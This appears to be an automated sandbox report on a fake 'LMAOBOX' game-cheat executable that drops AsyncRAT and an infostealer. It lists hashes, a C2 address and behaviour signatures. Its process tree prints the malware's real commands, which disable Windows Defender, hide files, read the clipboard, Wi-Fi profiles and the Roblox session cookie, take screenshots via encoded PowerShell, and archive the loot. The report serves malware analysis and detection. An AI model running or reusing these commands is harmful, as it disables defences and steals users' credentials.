Analysis

  • max time kernel
    35s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-10-2024 08:48

General

  • Target

    LMAOBOX2024UPDATED.exe

  • Size

    120.1MB

  • MD5

    264a408d44003e37218ddc3a89b5bab9

  • SHA1

    5b5c26831e56fce1c5e9c4a786f4d513d71cec72

  • SHA256

    b2bec8f81ead763ca0c4832018b182e897d3ad1c8192ce8757dcf7bc11bba34b

  • SHA512

    1f8b0189d3f3264d3b22aa65863aa8631851a372ee431d3bf6e0e466460a5e824598315ba2e3f6935639a92573019d64ba3e1f4d23acbf391bae9ea558780fc9

  • SSDEEP

    98304:CI7LjGgfbY1A+kd+wx1x1jF/IUSqKjJ5//4riHjHUUeX8QCxsoZz4MR002hO:CA2kd+wHx1jdPSToriHjdQ8QhouO0

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

fishing

C2

198.98.58.93:999

Mutex

fishing

Attributes
  • delay

    1

  • install

    true

  • install_file

    Core Sound Service.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\LMAOBOX2024UPDATED.exe
    "C:\Users\Admin\AppData\Local\Temp\LMAOBOX2024UPDATED.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1708
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAcQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAbQBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAcwB2ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2724
    • C:\Users\Admin\AppData\Local\Temp\LMAOBOXPREMIUM.exe
      "C:\Users\Admin\AppData\Local\Temp\LMAOBOXPREMIUM.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2260
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAeQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHUAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABjAG8AZABlACAAZQB4AGUAYwB1AHQAaQBvAG4AIABjAGEAbgBuAG8AdAAgAHAAcgBvAGMAZQBlAGQAIABiAGUAYwBhAHUAcwBlACAAVgBDAFIAVQBOAFQASQBNAEUAMQA0ADAALgBkAGwAbAAgAHcAYQBzACAAbgBvAHQAIABmAG8AdQBuAGQALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAZABmAHgAIwA+AA=="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5096
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAZgBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAYgBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdAB4ACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:536
      • C:\Users\Admin\AppData\Local\Temp\Built.exe
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:696
        • C:\Users\Admin\AppData\Local\Temp\Built.exe
          "C:\Users\Admin\AppData\Local\Temp\Built.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:5052
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:372
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:880
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:864
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:436
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
            5⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:1384
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
              6⤵
              • Views/modifies file attributes
              PID:2776
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4964
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4616
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4280
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3960
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2536
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4316
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
            5⤵
            • Clipboard Data
            • Suspicious use of WriteProcessMemory
            PID:4700
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-Clipboard
              6⤵
              • Clipboard Data
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1956
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3460
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:768
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tree /A /F"
            5⤵
              PID:3508
              • C:\Windows\system32\tree.com
                tree /A /F
                6⤵
                  PID:780
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                5⤵
                • System Network Configuration Discovery: Wi-Fi Discovery
                • Suspicious use of WriteProcessMemory
                PID:556
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profile
                  6⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:1488
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "systeminfo"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2640
                • C:\Windows\system32\systeminfo.exe
                  systeminfo
                  6⤵
                  • Gathers system information
                  PID:2596
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1100
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4500
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrspe3ki\xrspe3ki.cmdline"
                    7⤵
                      PID:2988
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB17D.tmp" "c:\Users\Admin\AppData\Local\Temp\xrspe3ki\CSC9659383AAF5497AB340D7AA349784CA.TMP"
                        8⤵
                          PID:2428
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    5⤵
                      PID:4048
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        6⤵
                          PID:3156
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        5⤵
                          PID:3088
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            6⤵
                              PID:4796
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            5⤵
                              PID:3508
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                6⤵
                                  PID:4272
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                5⤵
                                  PID:1656
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    6⤵
                                      PID:3128
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    5⤵
                                      PID:3832
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        6⤵
                                          PID:976
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        5⤵
                                          PID:4208
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            6⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4884
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                          5⤵
                                            PID:2428
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              6⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1256
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "getmac"
                                            5⤵
                                              PID:2120
                                              • C:\Windows\system32\getmac.exe
                                                getmac
                                                6⤵
                                                  PID:2192
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI6962\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\qD5iw.zip" *"
                                                5⤵
                                                  PID:1492
                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI6962\rar.exe
                                                    C:\Users\Admin\AppData\Local\Temp\_MEI6962\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\qD5iw.zip" *
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4144
